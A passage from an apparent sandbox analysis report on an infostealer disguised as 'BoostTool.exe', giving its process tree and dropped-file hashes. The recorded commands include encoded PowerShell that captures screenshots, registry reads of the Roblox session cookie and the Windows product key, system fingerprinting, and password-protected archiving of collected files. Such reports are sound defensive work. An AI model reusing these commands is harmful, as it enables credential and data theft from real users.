cABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                              PID:5988
                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                  PID:5656
                                                                                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1kkizoh4\1kkizoh4.cmdline"
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                      PID:516
                                                                                                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB145.tmp" "c:\Users\Admin\AppData\Local\Temp\1kkizoh4\CSC39821B4468944B1FA5E48529366E4B37.TMP"
                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                          PID:5968
                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:5720
                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                        PID:5192
                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                        PID:3700
                                                                                                                                                                                                                                        • C:\Windows\system32\tree.com
                                                                                                                                                                                                                                          tree /A /F
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                            PID:2300
                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                            PID:3808
                                                                                                                                                                                                                                            • C:\Windows\system32\tree.com
                                                                                                                                                                                                                                              tree /A /F
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                PID:212
                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                PID:3412
                                                                                                                                                                                                                                                • C:\Windows\system32\tree.com
                                                                                                                                                                                                                                                  tree /A /F
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                    PID:3088
                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                    PID:5800
                                                                                                                                                                                                                                                    • C:\Windows\system32\tree.com
                                                                                                                                                                                                                                                      tree /A /F
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                        PID:4396
                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                        PID:5424
                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                            PID:3124
                                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:1880
                                                                                                                                                                                                                                                            • C:\Windows\system32\tree.com
                                                                                                                                                                                                                                                              tree /A /F
                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                PID:3592
                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:5216
                                                                                                                                                                                                                                                                • C:\Windows\system32\getmac.exe
                                                                                                                                                                                                                                                                  getmac
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                    PID:116
                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI12162\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\DBjGs.zip" *"
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:4832
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI12162\rar.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\_MEI12162\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\DBjGs.zip" *
                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      PID:4768
                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:4288
                                                                                                                                                                                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                        wmic os get Caption
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                          PID:3704
                                                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                          PID:3336
                                                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                            wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                              PID:5644
                                                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:3196
                                                                                                                                                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                wmic csproduct get uuid
                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                  PID:4892
                                                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:5276
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                    PID:1572
                                                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:1784
                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                      wmic path win32_VideoController get name
                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                      • Detects videocard installed
                                                                                                                                                                                                                                                                                      PID:4848
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                      PID:5140
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                          PID:3040

                                                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                152B

                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                6960857d16aadfa79d36df8ebbf0e423

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                e1db43bd478274366621a8c6497e270d46c6ed4f

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                f40b812ce44e391423eb66602ac0af138a1e948aa8c4116045fef671ef21cd32

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                6deb2a63055a643759dd0ae125fb2f68ec04a443dbf8b066a812b42352bbcfa4517382ed0910c190c986a864559c3453c772e153ee2e9432fb2de2e1e49ca7fe

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                152B

                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                f426165d1e5f7df1b7a3758c306cd4ae

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                59ef728fbbb5c4197600f61daec48556fec651c1

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                b68dfc21866d0abe5c75d70acc54670421fa9b26baf98af852768676a901b841

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                8d437fcb85acb0705bf080141e7a021740901248985a76299ea8c43e46ad78fb88c738322cf302f6a550caa5e79d85b36827e9b329b1094521b17cf638c015b6

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                144B

                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                ab96ffdf079d26faca0e661c428acbdd

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                5f30bcb46bec404d01ce91a2e782b08da1aae51a

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                2e297d07bc56eb803c43bdb58c38b003687b1d3ab8e18499c422e00ee1483dac

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                035aae9296ad2d6456179eda6590a95c6c6bf600499fa970ba0a12333e252ffcc017df0720e1277e8054781da780f750bbf866a50fc485cff4aaf55099f52c94

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                399B

                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                25825d90d1b9ee75a7d57fe258d4e9ac

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                049c359c016e3973f9656acfb730afc97b2c8a47

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                abe59438ea9efc3795399242a90ad5d35b030080e1e0e5fa99cf0ea975608483

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                7c60456d8960d18cfe0a3e35d9b8a2cf5a7ae6a15081362fc81eef4251cb75240f4496216d9458d07fffbdb4158e939da7a0c6954dc17230a70d496f2e3507d8

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                6KB

                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                e889f799e0eed65003ba263cfcedf0f8

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                f8a4417c9415647ea59731fea3d1ad99f23b2b5e

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                06521c25e17fc7ae65352703b09e41dcbc022b37c3db3b460e75561724d9e50b

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                bbe5894e7359bada1421769928b46023dd83cce366922eecb485f1a17e3402a9012342ffd086e54d36923b410201965a35cd477fe173aef0f8f1836953976b17

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                5KB

                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                d417c9406ef6c2aa40fd0ba2943a29cc

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                65ed992df287d795a6ca1d99583583fa465e8e9a

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                bba81754e486082f13b17402727c20c2799b3b6a287cd4761417189751f5e5ff

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                290f076d12904fc1faabda7cdb339c2f64bcba89a2a8b0f11f54eb103b278ac610c3d4371897d2d245a17a9508549238b20146254f3fc0285e25898fe2661416

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                16B

                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                6752a1d65b201c13b62ea44016eb221f

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                10KB

                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                ef4aa5d4fb7956dcea679c12fa3f1766

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                4107d553727e09bd0e331fb3f0a708f8f421efb2

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                bddeeda8e04341ab24c05b5273dc4265b900109b374962b29dca2052635eb4a3

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                a8d54b41ddd0f31e9557f1a6b1d22741b6b94272910ddb58b6a5dba1b0435b7ab1658c1e91f24f56b8883eb9792136f79d1f8bcbf9f2b80f8d3eac4b62e394f0

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                7c7777b563dbfa4e93ead8a309ffe3da

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                cd2d94950838d1fb0dfc720e23f585e2b480826f

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                59c86b7dba92b82d811fd25a4039bbe0cd43c6c977da49eafa6cf73b46b20f04

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                ed809d75ff994038e78f5eabc95af822f43f1fde40d0b74fbcc8193e00d4511416c4ec5000f0a14be8565440410abd8c672d5e6b789369f5292352d1771c4e91

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                944B

                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                96ff1ee586a153b4e7ce8661cabc0442

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                140d4ff1840cb40601489f3826954386af612136

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\0j9CEQ6tbK.tmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                48KB

                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                349e6eb110e34a08924d92f6b334801d

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                bdfb289daff51890cc71697b6322aa4b35ec9169

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\BoostTool.exe

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                10.2MB

                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                6da2f39e2355080a048a6c75ab4cfaa9

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                ec27e52baa202c1af98d17f742160be932ad4620

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                e7f4bf1565d209d1563164fdf955169719bb2ebe42a8cae5bdcb9593f7ba4d99

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                cc0cd85cb3799c9dd7a70d42dea04f2de6a1c5e097ad69aef7b8f75c21309d84c1d455fe4bda50024109cfdec7305ccb10935be72a5754fa8b4b3bdb38da7e44

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LMdbCLORFq.tmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                114KB

                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                d0150bee5e917cfd7a7152d6c1988919

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                fbcb54efb2fc75f72eaea9605b1a2cae557a121b

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                ea86bc11680540f71d4740429e19804ad5c375e5ceee098981f6aebe691b71c1

                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                a3c542917de3538c0a10445f3fd96395cac0f2c572fccc948ed755864d5800af16957d7deb5973a469cde52582d3e3ee6f4d3e87acd7b1084d64441268b2504d

                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\QLjC4UvAVT.tmp

                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                160KB

                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                f310cf1ff562ae14449e0167a3e1fe46

                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                85c58afa9049467031c6c2b17f5c12ca73bb2788

                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855

